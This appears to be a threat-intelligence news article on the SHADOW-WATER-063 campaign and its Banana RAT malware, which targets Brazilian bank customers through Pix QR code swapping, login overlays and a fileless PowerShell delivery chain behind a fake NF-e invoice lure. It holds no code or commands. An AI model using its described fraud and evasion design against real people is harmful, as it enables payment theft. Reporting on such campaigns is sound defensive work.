A newly documented threat actor designated SHADOW-WATER-063 is running a campaign against customers and employees of major Brazilian financial institutions using a remote access trojan purpose-built for banking fraud. The most operationally dangerous capability of the malware, named Banana RAT, is its ability to intercept Brazil’s Pix instant payment QR codes — silently replacing a legitimate payment target with an attacker-controlled account at the moment of transaction. Because Pix transfers are instant and irreversible, victims typically have no recovery path once a payment routes to the wrong destination.
Banana RAT’s Pix QR Code Interception
Brazil’s Pix instant payment system processed over 60 billion transactions in 2025 and is deeply embedded in everyday commerce. Unlike traditional bank transfers, Pix operates without the processing windows that allow fraud detection teams to intervene before funds move. Banana RAT’s Pix interception module exploits this architecture: when a victim initiates a Pix payment using a QR code, the malware detects the action on-screen, replaces the QR code data with attacker-controlled payment credentials, and completes the substitution before the banking application encodes the transaction. The victim sees a legitimate interface; the funds move to an attacker-held account.
Banking Overlay Injection and Credential Capture
Beyond Pix interception, Banana RAT deploys banking overlay injections against specific bank portals operated by Itaú, Bradesco, and Santander — three of the major Brazilian financial institutions identified as targets in the campaign. When a victim navigates to an affected banking portal, the malware renders a transparent overlay that captures login credentials before passing the session through to the legitimate site, allowing the attacker to harvest banking credentials without triggering visible errors.
Banana RAT also maintains real-time screen capture and remote control capabilities, enabling the attacker to observe the victim’s screen and execute transactions manually while the victim’s system is active. Combined with keylogging and clipboard theft, this gives SHADOW-WATER-063 multiple overlapping channels for credential and payment theft from a single infected machine.
The NF-e Invoice Lure and Fileless Delivery Chain
The campaign’s delivery method targets a compliance reality that makes every Brazilian business a plausible victim: the NF-e, or Nota Fiscal Eletrônica, is Brazil’s official mandatory electronic invoice system. Every business operating in Brazil is legally required to issue NF-e documents, which means recipients are highly conditioned to open invoice notifications from unfamiliar suppliers. SHADOW-WATER-063 weaponizes this compliance expectation by distributing WhatsApp messages and phishing links directing victims to download a file named “Consultar_NF-e.bat” from domains spoofed to resemble official government sites.
Obfuscated PowerShell and In-Memory Execution
The batch file executes obfuscated PowerShell that retrieves AES-256-CBC-encrypted payloads from attacker-controlled infrastructure. Critically, those payloads are executed entirely in memory — no malware binary is written to disk at any stage of the infection chain. This fileless execution model significantly complicates endpoint detection: traditional antivirus and endpoint detection tools that rely on file scanning or file-write events have no artifact to identify, and behavioral detection must catch the PowerShell execution itself before the payload decrypts and runs in process memory.
The use of AES-256-CBC encryption for the payload adds another layer: network-level inspection that intercepts the download sees only ciphertext, and without the decryption key embedded in the initial PowerShell stage, automated sandboxes cannot reconstruct the full infection chain from network traffic alone.
SHADOW-WATER-063 as a Newly Documented Threat Actor
Analysis published May 22, 2026 by GBHackers marks the first time SHADOW-WATER-063 has appeared in public threat intelligence. The actor has no prior documented attribution history, meaning existing threat intelligence platforms carry no indicators of compromise, no historical infrastructure, and no prior campaign data. This absence of prior coverage means organizations relying on reputation-based blocking of known-bad infrastructure are starting from zero for this group.
Banana RAT itself is equally undocumented in prior public research. The first attribution of this malware family to SHADOW-WATER-063 leaves no historical baseline for defenders to assess how long the actor has been operational or how many campaigns preceded this one.
Brazil’s banking sector has historically attracted a well-developed ecosystem of financial trojans engineered specifically for Brazilian payment platforms and authentication mechanisms. Banana RAT’s Pix interception capability represents a specific evolution within that ecosystem — one that directly exploits the operational characteristics of an instant payment rail that has achieved near-universal adoption in Brazilian commerce. The combination of a mandatory-compliance delivery lure, a fileless execution chain, and a Pix-specific fraud module makes this campaign technically coherent and difficult to defend against at any single control point.
